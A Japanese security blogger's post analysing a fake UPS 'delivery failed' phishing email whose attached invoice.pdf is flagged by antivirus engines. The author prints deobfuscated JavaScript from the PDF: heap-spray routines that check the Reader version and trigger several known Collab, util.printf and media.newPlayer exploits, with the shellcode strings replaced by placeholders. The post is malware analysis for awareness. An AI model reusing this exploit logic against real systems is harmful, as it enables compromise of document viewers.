FC2ブログ

【今日のウイルスメール】久々に

件名
2nd attempt at Delivery

本文
Hi,
We attempted to deliver your order today but we are having problem with your delivery address.Please check the attached invoice in pdf in order to reconfirm your delivery address
Regards,
UPS Customer Service

添付ファイル
invoice.pdf

MD5: 09b6fe36cec138e0aa90a358c7c79eb4
Date first seen: 2010-12-10 08:10:49 (UTC)
Date last seen: 2010-12-10 08:10:49 (UTC)
Detection ratio: 15/43
ウイルスチェック結果
Antivirus Version Last update Result
AhnLab-V3 2010.12.10.00 2010.12.09 -
AntiVir 7.10.14.244 2010.12.09 HTML/Malicious.PDF.Gen
Antiy-AVL 2.0.3.7 2010.12.10 -
Avast 4.8.1351.0 2010.12.10 JS:Pdfka-gen
Avast5 5.0.677.0 2010.12.10 JS:Pdfka-gen
AVG 9.0.0.851 2010.12.10 -
BitDefender 7.2 2010.12.10 -
CAT-QuickHeal 11.00 2010.12.10 -
ClamAV 0.96.4.0 2010.12.10 PUA.PDF.RunJS
Command 5.2.11.5 2010.12.10 PDF/Obfusc.F!Camelot
Comodo 7010 2010.12.10 -
DrWeb 5.0.2.03300 2010.12.10 -
Emsisoft 5.1.0.1 2010.12.10 -
eSafe 7.0.17.0 2010.12.09 PDF.Exploit.1
eTrust-Vet 36.1.8032 2010.12.10 PDF/Pidief!generic
F-Prot 4.6.2.117 2010.12.09 -
F-Secure 9.0.16160.0 2010.12.10 -
Fortinet 4.2.254.0 2010.12.09 -
GData 21 2010.12.10 JS:Pdfka-gen
Ikarus T3.1.1.90.0 2010.12.10 -
Jiangmin 13.0.900 2010.12.10 -
K7AntiVirus 9.71.3200 2010.12.09 -
Kaspersky 7.0.0.125 2010.12.10 -
McAfee 5.400.0.1158 2010.12.10 Exploit-PDF.q.gen
McAfee-GW-Edition 2010.1C 2010.12.09 Exploit-PDF.q.gen
Microsoft 1.6402 2010.12.10 Exploit:Win32/Pdfjsc.G
NOD32 5690 2010.12.10 PDF/Exploit.Pidief.OJS.Gen
Norman 6.06.12 2010.12.10 -
nProtect 2010-12-10.01 2010.12.10 -
Panda 10.0.2.7 2010.12.09 Exploit/PDF.Gen.B
PCTools 7.0.3.5 2010.12.10 -
Prevx 3.0 2010.12.10 -
Rising 22.77.03.06 2010.12.10 -
Sophos 4.60.0 2010.12.10 Sus/PDFJs-Q
SUPERAntiSpyware 4.40.0.1006 2010.12.10 -
Symantec 20101.3.0.103 2010.12.10 -
TheHacker 6.7.0.1.097 2010.12.09 -
TrendMicro 9.120.0.1004 2010.12.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.12.10 -
VBA32 3.12.14.2 2010.12.09 -
VIPRE 7585 2010.12.10 Exploit.PDF-JS.Gen (v)
ViRobot 2010.12.10.4193 2010.12.10 -
VirusBuster 13.6.84.1 2010.12.09 -
MD5: 09b6fe36cec138e0aa90a358c7c79eb4
SHA1: 09ece8e33025c89b9e77fb94abf3c33efaaf6b50
SHA256: c9ae3e21b1d1c5e40dae4f19c3e114467720e8f954e6150370cb713aca338397
File size: 11582 bytes
Scan date: 2010-12-10 08:10:49 (UTC)


で、PDFに埋め込まれているJAVAスクリプトは難読化されている。解いてみると大体以下のような感じ、バージョン調べてそれに合わせて実行している。

function x35C2M(){
function fix_it(yarsp, len){
while (yarsp.length * 2 < len){
yarsp += yarsp;
}
yarsp = yarsp.substring(0, len/2);
return yarsp;
}

function util_printf(){
var payload = unescape("hogehoge");
var nop = unescape("")
var heapblock = nop + payload;
var bigblock = unescape("");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray){
bigblock += bigblock;
}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length-spray);
while (block.length+spray < 0x40000){
block = block + block + fillblock;
}
var mem_array = new Array();
for (var i = 0; i < 1400; i++){
mem_array[i] = block + heapblock;
}
var num =
12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("E000f", num);
}

function collab_email(){
var shellcode = unescape("hogehoge");
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("hogehoge");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;
for (var count = 0; count < count2; count++){
mem_array[count] = yarsp + shellcode;
}
var overflow = unescape("hogehoge");
while (overflow.length < 44952){
overflow += overflow;
}
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}

function collab_geticon(){
if (app.doc.Collab.getIcon){
var arry = new Array();
var vvpethya = unescape("hogehoge");
var hWq500CN = vvpethya.length * 2;
var len = 0x400000 - (hWq500CN + 0x38);
var yarsp = unescape("hogehoge");
yarsp = fix_it(yarsp, len);
var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
arry[vqcQD96y] = yarsp + vvpethya;
}
var tUMhNbGw = unescape(" ");
while (tUMhNbGw.length < 0x4000){
tUMhNbGw += tUMhNbGw;
}
tUMhNbGw = "N." + tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}

function newplayer(){
var SH = unescape("hogehoge");
var oDQvB = unescape("hogehoge");
var rffMwoiLDYsFNdKcPazkQfo = unescape("hogehoge");
while(oDQvB.length <= 32768) oDQvB+=oDQvB;
oDQvB=oDQvB.substring(0,32768 - SH.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= oDQvB + SH;}
util.printd("hogehoge", new Date());
util.printd("hogehoge", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(rffMwoiLDYsFNdKcPazkQfo, new Date());
}

function pdf_start(){
var version=app.viewerVersion.toString();
version=version.replace(/\D/g,'');
var ver_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

if((ver_array[0]<8)||(ver_array[0]==8&&ver_array[1]<2&&ver_array[2]<2)) {
collab_email();
}

if((ver_array[0]==8&&ver_array[1]<1&&ver_array[2]<3)||(ver_array[0]==9&&ver_array[1]<1)){
collab_geticon();
}

if((ver_array[0]==8&&ver_array[1]<2)|| (ver_array[0]==9&&ver_array[1]<3)){
newplayer();
}
}

コメント


非公開コメント

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り